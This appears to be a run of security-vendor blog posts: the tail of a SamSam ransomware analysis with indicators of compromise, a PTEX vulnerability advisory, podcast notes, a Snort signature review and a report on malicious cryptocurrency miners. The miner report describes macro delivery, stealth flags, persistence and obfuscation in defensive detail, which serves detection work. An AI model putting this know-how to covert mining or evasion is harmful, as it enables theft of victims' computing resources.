                  The new variant keeps the same list of targeted file extensions as some of the previous ones. It adds a few new entries to the list of paths not to encrypt, which includes user profiles "All Users", "default" and the boot directory.

                  This is in tune with most ransomware which attempt to preserve the operability of the victim's machine. If the machine operation is so damaged that the system cannot be booted then the victim will be unable to pay, whereas if they keep the machine able to function, with limited access to files/folders, then they have a greater chance of a victim paying for recovering their important files and documents.



                  Just like previous versions of SamSam the new version is especially careful to make sure that there is enough space on the current drive to create the encrypted document, thus avoiding any corruption that would lead to irrecoverable encryption.



                  Unlike most ransomware, SamSam does not delete Volume Shadow Copies and creates an encrypted version of the original file which is then deleted using the regular Windows API. Although unlikely, due to block overwriting, recovery of the original files from the versions of affected folders saved by the operating system may be possible.

                  Profitability


                  In identifying the scope of this SamSam campaign, Talos analyzed the Bitcoin wallet addresses used by the attackers in each of these attacks. As of the time of this writing, the attackers have received approximately 30.4 BTC which equals $325,217.07. As previously mentioned, it is possible that the attackers are leveraging multiple bitcoin wallets, however Talos has not observed any other than the one listed here being used in these attacks.


                  Recommendations


                  As the specific initial threat vector is not known at this time, best practices should be implemented to minimize risk to organizations. Talos has outlined several best practices that should be considered in a previous blog related to defending against ransomware related threats. In accordance with best practices protocols like SMB or RDP should never be internet facing.

                  IOCs

                  SHA256s

                  0785bb93fdb219ea8cb1673de1166bea839da8ba6d7312284d2a08bd41e38cb9
                  338fdf3626aa4a48a5972f291aacf3d6172dd920fe16ac4da4dd6c5b999d2f13
                  3531bb1077c64840b9c95c45d382448abffa4f386ad88e125c96a38166832252
                  4856f898cd27fd2fed1ea33b4d463a6ae89a9ccee49b134ea8b5492cb447fb75
                  516fb821ee6c19cf2873e637c21be7603e7a39720c7d6d71a8c19d8d717a2495
                  72832db9b951663b8f322778440b8720ea95cde0349a1d26477edd95b3915479
                  754fab056e0319408227ad07670b77dde2414597ff5e154856ecae5e14415e1a
                  88d24b497cfeb47ec6719752f2af00c802c38e7d4b5d526311d552c6d5f4ad34
                  88e344977bf6451e15fe202d65471a5f75d22370050fe6ba4dfa2c2d0fae7828
                  8eabfa74d88e439cfca9ccabd0ee34422892d8e58331a63bea94a7c4140cf7ab
                  8f803b66f6c6bc4da9211a2c4c4c5b46a113201ecaf056d35cad325ec4054656
                  dabc0f171b55f4aff88f32871374bf09da83668e1db2d2c18b0cd58ed04f0707
                  e7bebd1b1419f42293732c70095f35c8310fa3afee55f1df68d4fe6bbee5397e

                  BTC Wallet

                  1MddNhqRCJe825ywjdbjbAQpstWBpKHmFR

                  Tor onion service

                  jcmi5n4c3mvgtyt5.onion

                  References:


                  https://www.codeproject.com/kb/security/dotnetcrypto.aspx?msg=1790665

                  Detection


                  Snort Rules: 45484-45486

                  AMP for Endpoints: Ensure the TETRA engine, ‘Command Line Capture’, “System Process Protection” are enabled, and client is v6.05+

                  Vulnerability Spotlight: Walt Disney Per-Face Texture Mapping faceInfoSize Code Execution Vulnerability

                  $
                  0
                  0
                  This vulnerability was discovered by Tyler Bohan of Cisco Talos.

                  Executive Summary


                  Walt Disney PTEX is an open source software application maintained by Walt Disney Animation Studios. It is designed for use in post-production rendering. It allows for the storage of thousands of texture mappings within a single file. This particular software library is in many other software applications such as Pixar's RenderMan, giving it a large install base. A list of other applications that have incorporated PTEX is available here. Talos has recently discovered a stack-based buffer overflow in PTEX that could potentially allow a remote attacker to execute arbitrary code on affected systems.

                  Vulnerability Details


                  Walt Disney Per-Face Texture Mapping faceInfoSize Code Execution Vulnerability (TALOS-2018-0515 / CVE-2018-3835)

                  This vulnerability manifests when a file is read due to lack of proper parameter checking. When reading in files, the value of the 'faceInfoSize' parameter is not properly checked for validity. Reading a file with a specially crafted 'faceInfoSize' value could cause an out of bounds write condition resulting in a buffer overflow that could potentially allow code execution. For full technical details regarding this vulnerability, please see the advisory here.

                  Versions Tested


                  Walt Disney Animation Studios PTEX 2.2

                  Conclusion


                  Walt Disney Animation Studios has released PTEX version 2.1.33 to address this issue. Talos recommends installing this update as quickly as possible on affected systems. As this library has been incorporated in several other applications, it is recommended that they be evaluated to determine if they are also affected by this vulnerability.

                  Coverage


                  The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

                  Snort Rules: 45502-45503

                  Beers with Talos EP 21: How to Hire the Best, Attribution Without Apaches is Useless

                  $
                  0
                  0


                  Beers with Talos (BWT) Podcast Episode 21 is now available.  Download this episode and subscribe to Beers with Talos:

                  If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

                  EP21 Show Notes: 

                  It is a packed episode this time! We are joined by Edmund from the Talos Outreach Group to chat about Threat Modeling after we make our way through attribution and Group 123, hipster artisanal patching (hand flipped bits!), and spend a good bit of time talking about how Talos identifies the cream of the crop when we are hiring.

                  Timeline:

                  The Roundtable

                  01:42 - Joel: Furbo follow-up and banning timezones
                  06:06 - Craig: Paul’s Poor Visual Choices continued
                  08:09 - Nigel: The Mighty Reds are again glorious and victorious
                  10:16 - Mitch: A lonely drone in the tree no more
                  11:06 - Matt: An apology after listening to an entire Beasties concert

                  The Topics

                  12:40 - Meet Edmund
                  13:46 - Group123 Targeting S. Korea and Attribution is all anyone wants to hear
                  25:27 - Equation Editor - Even novel patching by legit wizards couldn’t save it
                  36:10 - Identifying the cream of the crop in your security org
                  50:47 - Threat Modeling and why people suck at it
                  1:02:52 - Parting shots

                  The Links:

                  Paul’s BlackBerry background: https://twitter.com/r00tbsd/status/954392019358703616
                  Korea in the Crosshiars: http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html
                  Private-Sector Attribution of Cyber Attacks: https://lawfareblog.com/private-sector-attribution-cyber-attacks-growing-concern-us-government
                  Creativity Inc: http://www.creativityincbook.com/about/

                  ==========

                  Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
                  Hosted by Mitch Neff (@MitchNeff).

                  Find all episodes:
                  http://cs.co/talospodcast

                  Subscribe via iTunes (and leave a review!)
                  http://cs.co/talositunes

                  Check out the Talos Threat Research Blog:
                  http://cs.co/talosresearch

                  Subscribe to the Threat Source newsletter:
                  http://cs.co/talosupdate

                  Follow Talos on Twitter:
                  http://cs.co/talostwitter

                  Give us your feedback and suggestions for topics:
                  beerswithtalos@cisco.com

                  2017 in Snort Signatures.

                  $
                  0
                  0
                  This post was written by Martin Lee and Vanja Svajcer.

                  2017 was an eventful year for cyber security with high profile vulnerabilities that allowed self-replicating worm attacks such as WannaCry and BadRabbit to impact organizations throughout the world. In 2017, Talos researchers discovered many new attacks including backdoors in legitimate software such as CCleaner, designed to target high tech companies as well as M.E.Doc, responsible for initial spread of Nyetya. Despite all those, headline making attacks are only a small part of the day to day protection provided by security systems.

                  In this post we review some of the findings created by investigating the most frequently triggered Snort signatures as reported by Cisco Meraki systems and included in the Snort default policy set.

                  Top 5 Signatures


                  Snort signatures are classified into different classes based on the type of activity detected with the most commonly reported class type being “Trojan-activity” followed by “Policy-violation” and “Misc-activity”. Some less frequently reported class types such as “Attempted-admin” and “Web-application-attack” are particularly interesting in the context of detecting malicious inbound and outbound network traffic.

                  Snort signatures are identified from three parts. The Generator ID (GID), the Signature ID (SID) and revision number. The GID identifies what part of Snort generates the event; ‘1’ indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search box on the Snort website. The revision number is the version of the rule; be sure to use the latest revision of any rule.

                  Without a further ado, here are the top 5 triggered signatures within policy in reverse order, just as you would expect from a yearly Top of the Snort alerts chart.

                  #5 - 1:39867:3 “Suspicious .tk dns query”


                  The .tk top level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the prolific in terms of number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers.

                  This signature triggers on DNS lookups for .tk domains. Such a case doesn’t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers.

                  Other, similar signatures detecting DNS lookups to other rarely used top level domains such as .bit, .pw and .top also made into our list of top 20 most triggered rules.

                  #4 - 1:23493:6 “Win.Trojan.ZeroAccess outbound connection”


                  ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click fraud campaigns. This rule detects UDP packets sent by an infected system to so called super nodes, which participate in the network of command and control servers. The rule can be used to block outbound communication from the malware.

                  ZeroAccess is a state of the art rootkit and is able to hide from the basic detection techniques on the infected machine. However, network detection using IPS such as Snort can quickly pinpoint a source of the malicious ZeroAccess traffic as it generates a fairly noisy and regular communication pattern.

                  The malware sends a UDP packet to check with a super node once every second, so a single affected organization is expected to have many alerts. This may be one of the reasons why the ZeroAccess detection signature is placed high on our list.

                  #3 - 1:41083:1 “suspicious .bit dns query”


                  The .bit top level domain extension is relatively obscure, but is occasionally used for hosting malware C2 systems with Necurs being one of the families using it as a part of the botnet communication. The .bit TLD is managed using Namecoin, a distributed ledger with no central authority that is one of the first forks of the Bitcoin cryptocurrency. The decentralised nature of .bit domains means that few DNS servers resolve the domains, but equally the domains are resistant to take down.

                  The signature triggers on DNS lookups for .bit domains. As with .tk lookups, if the signature triggers, this doesn’t necessarily mean that such a lookup is malicious in nature. However, a sharp increase in the rule triggering may warrant investigation.

                  #2 - 1:42079:1 “Win.Trojan.Jenxcus outbound connection attempt with unique User-Agent”


                  Jenxcus is more of a worm than a trojan, despite the naming used in the human readable description of the signature. It spreads by copying itself to removable and shared drives and allows the attacker to remotely access and control the infected system. Like many trojans, once a system is infected, Jenxcus seeks to establish contact with its’ C2 infrastructure. This contact is made with a HTTP POST request using a specific user-agent string. The user-agent string itself is specific to this trojan and its many variants, and can be detected and blocked using this signature.

                  #1 - 1:40522:3 “Unix.Trojan.Mirai variant post compromise fingerprinting”


                  Internet of Things (IoT) security is something which we have written about extensively. The Mirai botnet, and variants, continue to try and infect IoT devices through attempting to login with default usernames and passwords. Once the malware successfully accesses a device, it will check that the device behaves as expected and not like a honeypot. It is this check which is detected by this rule. This post compromise activity has been constantly present throughout the year and at the peak of its activity in February accounted for over 20% of all alerts reported daily.

                  Inbound, Outbound or Internal


                  Network traffic can cross an IDS from external to internal (inbound) from the internal to external (outbound) or pass the sensor without traversing it, as internal traffic. An alert may be triggered and logged for any of these scenarios.

                  Outbound signatures were triggered during 2017 much more frequently than internal, which in turn were more frequent than inbound with ratios of approximately 9:6:5. The profile of the alerts are different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. Internal alerts are most likely to be due to trojan or miscellaneous activity.

                  Looking at these data sets in more detail gives us the following:

                  “Trojan-activity” class type alerts were dominated by the Mirai post compromise fingerprinting attempts, but this category also contains blocked attempts to download executable files disguised as plain text, and traffic associated with Zeus, Swabfex, Soaphrish, Glupteba malware.

                  The “Attempted-user” class type covers attempts to exploit user level vulnerabilities. The majority of the most frequently triggered signatures in this set were detected attempts to exploit Internet Explorer vulnerabilities.


                  Outbound signatures most frequently reported class types of detections triggering on internal network traffic belong to the “Misc-activity” and “Trojan-activity” classes.

                  The most frequently triggered signatures within the “Trojan-activity” signature class are the Jenxcus and .bit dns activity signatures discussed above. Other prevalent trojan activity is related to ZeroAccess, Cidox, Zeus and Ramnit trojans.


                  Internal traffic signature types most frequently reported detection class types belong to the “Misc-activity” and “Trojan-activity” classes.

                  Misc activity signatures include detections for various traffic patterns which do not easily fit into any other specific class types. This includes detection of DNS requests to less common top level domains like .top, .win, .trade, detection of traffic to domains known to be used by adware and other potentially unwanted applications (PUAs) as well as detection of suspicious HTTP user-agent strings.

                  Peaks and Troughs


                  Attacks are happening continuously. Every hour of the day, every day of the year signatures are being triggered by the constant background noise of the attackers’ activity. However, some signatures are clearly triggered by malicious activity being conducted during a particular period.

                  On March 6th, Apache disclosed an Apache Struts command injection vulnerability CVE-2017-5638. Talos released signature 1:41818 to detect and block exploitation of the vulnerability. Within a couple of days, attackers were conducting widespread campaigns to identify and compromise vulnerable systems.

                  As shown in the graph below, attempts to exploit CVE-2017-5638 comprised more than 20% of all triggering signatures at the peak of the malicious activity. This campaign soon abated, but never ceased completely, until a second large peak in activity occurred over 6 days at the end of October.

                  This graph neatly illustrates the importance of patching as well as installing and enabling signatures for new vulnerabilities as soon as possible. There may be a very short period of time between the disclosure of a vulnerability and the widespread attempted exploitation of the vulnerability by threat actors.

                  Similarly, once an initial attempt to compromise is over, the same attack may recommence some time later, so defences need to be maintained in order to ensure that systems are kept protected.

                  Another interesting pattern showing several periods of increased activity can be seen in the timeline for signature 1:40843. This signature detects and blocks the so called SSL Death Alert Denial of Service vulnerability in OpenSSL (CVE-2016-8610). An attacker can exploit vulnerable systems over the network to consume 100% CPU, preventing the system from responding to legitimate requests.
                  For extended periods during 2017, this vulnerability was not heavily targeted by attackers. However there are very clear periods when attackers were conducting campaigns to exploit this vulnerability.

                  Our primary advice is to install patches as soon as possible. However, patched versions of some software packages are not being released for this vulnerability. In this case, upgrading to a non-vulnerable version would be the preferred option, but this may not be possible in every case. Ensuring that vulnerable systems are protected by IPS with the relevant signatures installed and enabled, helps keep malicious traffic from impacting unpatched vulnerable systems.

                  Discussion


                  Snort signatures detect potentially malicious network activity. Understanding why particular signatures are triggered and how they can protect systems is a key part of network security. Snort signatures can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization’s security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated.

                  As the threat environment changes, it is necessary to ensure that the correct signatures are in place protecting systems. Usually, this means ensuring that the most recent signature set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short.

                  Our most commonly triggered signature in 2017: 1:40522:3 “Unix.Trojan.Mirai variant post compromise fingerprinting” highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected.

                  Security teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the signatures to be open source. Knowing what network content caused a signature to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection.

                  At Talos, we are proud to maintain a set of open source Snort rules and support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We’re also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well through the release of additional open-source tools and the detailing of attacks on our blog.

                  There is no doubt that 2018 will bring its own security challenges and it will be interesting to follow how reported detections are evolving over the year together with new threats. We will make sure to keep you up to date with events relevant to your organizations and networks.

                  Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions

                  $
                  0
                  0

                  The Dark Side of the Digital Gold Rush


                  This post was authored by Nick Biasini, Edmund Brumaghin, Warren Mercer and Josh Reynolds with contributions from Azim Khodijbaev and David Liebenberg.


                  Executive Summary


                  The threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining related attacks have emerged as a primary interest for many attackers who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to actually engage the victim and without the extraneous law enforcement attention that comes with ransomware attacks.

                  This focus on mining isn't entirely surprising, considering that various cryptocurrencies along with "blockchain" have been all over the news as the value of these currencies has exponentially increased. Adversaries have taken note of these gains and have been creating new attacks that help them monetize this growth. Over the past several months Talos has observed a marked increase in the volume of cryptocurrency mining software being maliciously delivered to victims.

                  In this new business model, attackers are no longer penalizing victims for opening an attachment, or running a malicious script by taking systems hostage and demanding a ransom. Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining. In these cases the better the performance and computing power of the targeted system, the better for the attacker from a revenue generation perspective. IoT devices, with their lack of monitoring and lack of day to day user engagement, are fast becoming an attractive target for these attackers, as they offer processing power without direct victim oversight. While the computing resources within most IoT devices are generally limited, the number of exposed devices that are vulnerable to publicly available exploits is high which may make them attractive to cyber criminals moving forward.

                  To put the financial gains in perspective, an average system would likely generate about $0.25 of Monero per day, meaning that an adversary who has enlisted 2,000 victims (not a hard feat), could generate $500 per day or $182,500 per year. Talos has observed botnets consisting of millions of infected systems, which using our previous logic means that these systems could be leveraged to generate more than $100 million per year theoretically. It is important to note that due to volatility present across cryptocurrency markets, these values may change drastically from day to day. All calculations in this blog were made based on XMR/USD at the time of this writing.

                  This is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity. While these are impressive figures, it's also important to factor in a few details that can further increase the value of these attacks exponentially:
                  • The value of many cryptocurrencies are skyrocketing. Monero, one of the most popular mining targets, saw a 3000% increase over the last 12 months.
                  • These attacks are much stealthier than their predecessors. Attackers are not stealing anything more than computing power from their victims and the mining software isn't technically malware -- So theoretically, the victims could remain part of the adversary's botnet for as long as the attacker chooses.
                  • Once the currency is mined, there is no telling what the attacker might do with it. This could become a long term investment (or even retirement) scheme for these attackers – sitting on this currency until it hits such a point where the attacker decides to cash in.

                  Introduction


                  Throughout the past couple of years ransomware has dominated the threat landscape and for good reason. It creates a highly profitable business model that allows attackers to directly monetize their nefarious activities. However, there are a couple of limitations with the use of ransomware. First is the fact that only a small percentage of infected users will actually pay the ransom demanded by the attacker. Second, as systems and technology get better at detecting and blocking ransomware attacks the pool of possible victims is changing. Potential victims in many countries lack the financial capabilities to pay $300-$500 to retrieve their data. Possibly related to these aforementioned limitations, we have begun to see a steady shift in the payloads that are being delivered. This is especially true for some of the most common methods for malware distribution such as exploit kits and spam campaigns.

                  Over the past several months Talos has started to observe a marked increase in the volume of cryptocurrency miners being delivered to victims. Cryptocurrency and "blockchain" have been all over the news over the past several months as the value of these currencies has increased on an exponential path. One of the most effective ways to generate these currencies is through mining and adversaries are obviously paying attention.

                  What is 'Mining'?


                  At a high level mining is simply using system resources to solve large mathematical calculations which result in some amount of cryptocurrency being awarded to the solvers. Before we get too deep into mining let's address the currencies that make sense to mine.

                  Bitcoin (BTC) is the most well known and widely used cryptocurrency by a wide margin. It's been mined since its inception, but today mining isn't an effective way to generate value. If you look across all of the cryptocurrencies, there are only a couple that are worth mining without specialized hardware called ASICs (Application Specific Integrated Circuits). The differences across the different cryptocurrencies are based on the hashing algorithm used. Some have been specifically designed in an attempt to prevent or hinder the use of such specialised hardware and are more focused on consumer grade equipment such as CPU & GPU hardware. Currently, the most valuable currency to mine with standard systems is Monero (XMR) and adversaries have done their research. In addition Monero is extremely privacy conscious and as governments have started to scrutinize Bitcoin more closely, Monero and other coins with heavy emphasis on privacy may become a safe haven for threat actors.

                  There are two ways that mining can be performed, either with a stand alone miner or by leveraging mining pools. Pool-based crypto mining allows you to pool the resources of multiple systems resulting in a higher hashrate and theoretically the production of increased amounts of currency. It's pool-based mining of Monero that we have seen most frequently leveraged by attackers as it allows for the greatest amount of return on investment and the required mining software can be easily delivered to victims. The use of pooled mining also maximizes the effectiveness of the computing resources found in standard systems that attackers attempt to compromise. This is similar to launching Distributed Denial of Service (DDoS) attacks where 100,000 machines flooding a target with bogus traffic becomes much more effective compared to a single system under the attacker's control sending bogus traffic.

                  How does pool based mining work?


                  Pool-based mining is coordinated through the use of 'Worker IDs'. These IDs are what tie an individual system to a larger pool and ensures the coin mined by the pool that is associated with a particular Worker ID are delivered to the correct user. It's these Worker IDs that allowed us to determine the size and scale of some of the malicious operations as well as get an idea of the amount of revenue adversaries are generating. For the purposes of this discussion we will be assuming the following:
                  1. The amount of hashes per second that a typical computer can compute will be assumed to be ~125 H/s.
                  2. While in reality mining does not always guarantee successful generation of the cryptocurrency being mined, we will assume that for our purposes it is successful as it allows for a better understanding of the earning potential for these malicious mining pools.
                  These miners typically operate from the command line and make use of a series of arguments used to establish how the mining should be performed. A typical example of the command line syntax used to execute the mining software and specify the arguments is below: (note that there are variations in the parameter names used based on the specific mining software being used.)
                  Example Command Line Syntax

                  As you can see there are two primary argument values required: The URL for the mining pool and the 'Worker ID' that is used to tie the mining activity taking place on the system to a specific mining pool which is used to manage how payouts are conducted. However, through our investigation we have found a plethora of other parameters that attackers or miners can specify in an attempt to hide their activities. If the mining software is executed without these options, victims might notice significant performance degradation on their systems as no computing resource limits are enforced. These options include:
                  • Limits on CPU Usage.
                  • Limits on System Temperature.
                  • Amount of cores being used.
                  • Sleep periods.
                  Each mining program comes with its own set of flags that are taken advantage of in various ways by both legitimate and malicious miners. We have observed that these options are typically deployed by the attackers when they achieve persistence (i.e. through the creation of Scheduled Tasks or Run keys that execute the miner using the Windows Command Processor specifying the arguments to use).

                  Origins on the Underground


                  Talos has been observing discussions regarding the use of crypto miners as malicious payloads by both Chinese and Russian crimeware groups. We first observed Chinese actors discussing miners and the associated mining botnets in November 2016 and the interest has been steadily building since that time.

                  From a Russian underground perspective there has been significant movement related to mining in the last six months. There have been numerous discussions and several offerings on top-tier Russian hacking forums. The discussions have been split with the majority of the discussion around the sale of access to mining bots as well as bot developers looking to buy access to compromised hosts for the intended purpose of leveraging them for crypto mining. The popularity increase has also been accompanied with a learning curve associated with mining, including a better understanding around how much coin can be mined and the opportune times to conduct the mining activity. As far as the malware that can be used to conduct mining, most of them are written in C# or C++ and as is common on these forums they are advertised with low detection rate, persistence, and constant development. In many cases we are observing updates to these threats on a daily or weekly basis.

                  In general the attackers have been pleased with the amount of revenue the bots generate as well as the potential to grow that revenue. This is indicative of a threat that is poised to become more pervasive over time. Let's take a look at how malicious mining works and the threats that are delivering them.

                  Malicious Mining


                  Malicious mining is the focus of this post since its an emerging trend across the threat landscape. Adversaries are always looking for ways to monetize their nefarious activities and malicious mining is quickly becoming a cash cow for the bad guys.

                  Over the past several years ransomware has dominated the threat landscape from a financially motivated malware perspective and with good reason. It is an extremely profitable business model as we've shown through our Angler Exploit Kit research where we estimate that the adversaries behind Angler could have been conservatively making at least $30 million annually. However, with success comes attention and with that attention came an increased focus on stopping this type of activity. Both operating systems and security vendors got better at stopping ransomware before it affected much of the system.

                  Adversaries are left with an interesting decision, continue leveraging ransomware as a primary source of revenue as the pool of users and vulnerable systems continues to shrink or begin leveraging other payloads. There are no shortage of options available to bad guys including banking trojans, bots, credential stealers, and click-fraud malware to name a few.

                  So why choose crypto mining software?

                  There are many reasons why adversaries might choose to leverage crypto mining to generate revenue. One likely reason is that this is a largely hands off infection to manage. Once a system has a miner dropped on it and starts mining nothing else is needed from an adversary perspective. There isn't any command and control activity and it generates revenue consistently until its removed. So if an adversary notices a drop off in nodes mining to their pool it's time to infect more systems. Another is that it's largely unnoticed by the majority of users. Is a user really going to notice that mining is going on while they are reading their email, browsing the web, or writing up their latest proposal? From this perspective miners are the polar opposite of ransomware, hiding under the users purview for as long as possible. The longer the user doesn't notice the miner running the larger potential payout for the activity.

                  The biggest reason of them all is the potential monetary payout associated with mining activity. If it didn't generate a profit, the bad guys wouldn't take advantage of it. In this particular vein malicious miners could be a pretty large source of revenue. The biggest cost associated with mining is the hardware to mine and the electricity to power the mining hardware. By leveraging malicious miners attackers can take both of those costs out of the equation altogether. Since they are able to take advantage of computing resources present in infected systems, there is no cost for power or hardware and attackers receive all the benefits of the mined coin.

                  Let's take a deeper dive on the amount of revenue these systems can potentially generate. As mentioned earlier the hashrate for computers can vary widely depending on the type of hardware being used and the average system load outside of the miners. An average system would likely compute somewhere around 125 hashes per second. One system alone without any hardware or electricity cost would generate about $0.25 of Monero a day, which doesn't seem like a lot but when you start pooling systems the amount of earning potential increases rapidly.

                  Some of the largest botnets across the threat landscape consist of millions of infected systems under the control of an attacker. Imagine controlling a small fraction of the systems that are part of one of these botnets (~2,000 hosts). The amount of revenue that can be generated per day increases considerably to more than $500 in Monero per day or $182,500 per year. As we will demonstrate later in the post we have seen malicious pools that far exceed the 125 KH/s necessary to generate this type of revenue.

                  In one campaign that we analyzed, the attacker had managed to amass enough computing resources to reach a hash rate of 55.20 KH/s. As can be seen in the below screenshot the Total Paid value was 528 XMR, which converts to approximately $167,833 USD. In this particular case the mining pool realized that the 'Worker ID' was being used by a botnet to mine Monero.
                  Worker ID Statistics

                  In a series of attacks that we observed that began at the end of December 2017, attackers were leveraging exploits targeting Oracle WebLogic vulnerabilities (CVE-2017-3506 / CVE-2017-10271). In these cases, successful exploitation would often lead to the installation and execution of mining software.
                  Historical Hash Rate

                  In analyzing the size and scope of this campaign, we observed that shortly after these attacks began the 'Worker ID' being used was generating over 500 KH/s. At the time of this writing, this particular attacker is still generating approximately 350 KH/s.
                  Current Hash Rate

                  Using an online calculator that takes hash rate, power consumption and cost then estimates profitability. Given a hash rate of 350 KH/s, the estimated amount of Monero that would be mined per day was 2.24 XMR. This means that an attacker could generate approximately $704 USD per day, which equals $257,000 per year. This clearly indicates how lucrative this sort of operation could be for attackers.

                  Analyzing the statistical data and payment history information associated with this 'Worker ID' shows that a total of 654 XMR have been received. At the time of this writing, that would be worth approximately $207,884.
                  Worker ID Payment History

                  While analyzing the malware campaigns associated with the distribution of mining software, we identified dozens of high volume 'Worker IDs'. Taking a closer look at 5 of the largest operations we analyzed shows just how much money can be made by taking this approach.
                  High Volume Calculations

                  One additional benefit is that the value of the Monero mined has continued to rise over time. Much like Bitcoin, Monero valuation has exploded over the last year from $13 in January 2017 to over $300 at the time of this article and at times has approached $500. As long as the cryptocurrency craze continues and the value continues to increase, every piece of cryptocurrency mined increases in value which in turn increases the amount of revenue generated. That covers some of the financial reasons adversaries leverage malicious mining, but how are these miners getting on to systems in the first place.

                  Threats Delivering Miners


                  Cryptocurrency miners are a new favorite of miscreants and are being delivered to end users in many different ways. The common ways we have seen miners delivered include spam campaigns, exploit kits, and directly via exploitation.

                  Email Based


                  There are ongoing spam campaigns that deliver a wide variety of payloads such as ransomware, banking trojans, miners, and much more. Below are examples of campaigns we've seen delivering miners. The way these infections typically work is that a user is sent an email with an attachment. These attachments typically have an archive containing a Word document that downloads the miner via a malicious macro or unpacks a compressed executable that initiates the mining infection. In many of the campaigns Talos observed, the binary that is included is a widely distributed Monero miner which is executed with the miscreants worker ID and pool, allowing attackers to reap the mining benefits.

                  Below is an example, from late 2017, of one of these campaigns. It's a job application spoof that includes a Word document purporting to be a resume of a potential candidate.
                  Example Malicious Email

                  As you can see the email contains a word document which, when opened, looks like the following.
                  Example Word Document

                  As is common for malicious Word documents, opening the document results in a file being downloaded. This is an example of a larger miner campaign dubbed 'bigmac' based on the naming conventions used.

                  This image entices the user to enable macro content within the document that is blocked by default. Once clicked, Word executes a series of highly obfuscated VBA macros using the Document_Open function:
                  Highly Obfuscated VBA Macros Using Document_Open()

                  The macro leads to a call to a Shell command:
                  Highly Obfuscated VBA Macro VBA.Shell Call

                  We can see what is executed by this command after it is de-obfuscated by setting the first parameter into a MsgBox call:
                  MsgBox for Shell Replacement

                  This will retrieve an executable remotely using System.Net.WebClient and execute it using Start-Process. This can also be seen through the dynamic activity in Threat Grid:
                  Office Document Launches a Powershell Indicator in Threat Grid

                  We also identify that the downloaded binary is attempting to masquerade itself through its use of an image extension:
                  Portable Executable Image Extension Identification Threat Grid

                  In this case the binary that is downloaded is a portable executable written in VB6 that executes a variant of the xmrig XMR CPU miner. This activity can be seen dynamically within Threat Grid:
                  xmrig Execution in Threat Grid

                  Dynamic miner activity can also be observed within the AMP for Endpoints product line. An example below can be seen within the portal's Device Trajectory:
                  Dynamic Miner Execution in AMP for Endpoint's Device Trajectory

                  Mining network traffic can also be classified using Cognitive Threat Analytics to identify miners within enterprise environments:
                  Mining Traffic Classification using Cognitive Threat Analytics

                  Dark Test Cryptomining Malware


                  Dark Test (the name taken from the decompiled source code) is an example of Cryptomining malware written in C# that drops a UPX packed variant of the xmrig XMR CPU miner. Being written in C#, the binary contains .NET IL (Intermediate Language) which can be decompiled back into source code. The C# code is highly obfuscated containing an encrypted resource section for all referenced strings, and functions that are resolved at runtime. The following section will discuss these techniques in detail.

                  Dark Test Obfuscation


                  Dark Test makes use of a packer which, after unpacking, creates a suspended version of itself using CreateProcessA and overwrites itself in memory with the unpacked version of the binary using WriteProcessMemory. The original binary can be recovered simply by setting a breakpoint on WriteProcessMemory within a debugger and dumping from the address of lpBuffer buffer up to nSize.

                  Dark Test contains highly obfuscated C# code made up of a large amount of garbage instructions, arithmetic for branching to varying code sections, encrypted strings stored within its resource section, and functions that are resolved at runtime. Functions are resolved on load using arithmetic operations resulting in the metadataToken passed to Method.ResolveMethod and MethodHandle.GetFunctionPointer:
                  Dynamic Method Resolution Using metadataToken Integer

                  Functions are also indirectly called using the calli function which is passed a pointer to an entry point of a function and its accompanying parameters:
                  Runtime Resolved Function Calls using calli

                  The decryption function takes three integer parameters. The first two make up the seek offset for the length and offset of the string to be decrypted, and the third is the XOR key for the string at this offset:
                  Dark Test String Decryption Function

                  At the calculated offset, the first four bytes is the offset of the ciphertext, and the next four is length of the string being decrypted. It then iterates for this length within an XOR for loop to decrypt the string at this offset. These integer parameters are calculated at runtime, typically through a series of arithmetic operations and referenced runtime objects:
                  Dark Test String Decryption Function Call

                  The result, in this case, being the string "-o pool.minexmr.com:4444 -u" which is the domain and port combination for the mining pool the miner is participating in and the username parameter without a value. Although these strings are decrypted at runtime they are easily seen through the dynamic activity execution within Threat Grid (in this case another pool is chosen from the config for use):
                  Dynamic Miner Activity Command Line Arguments

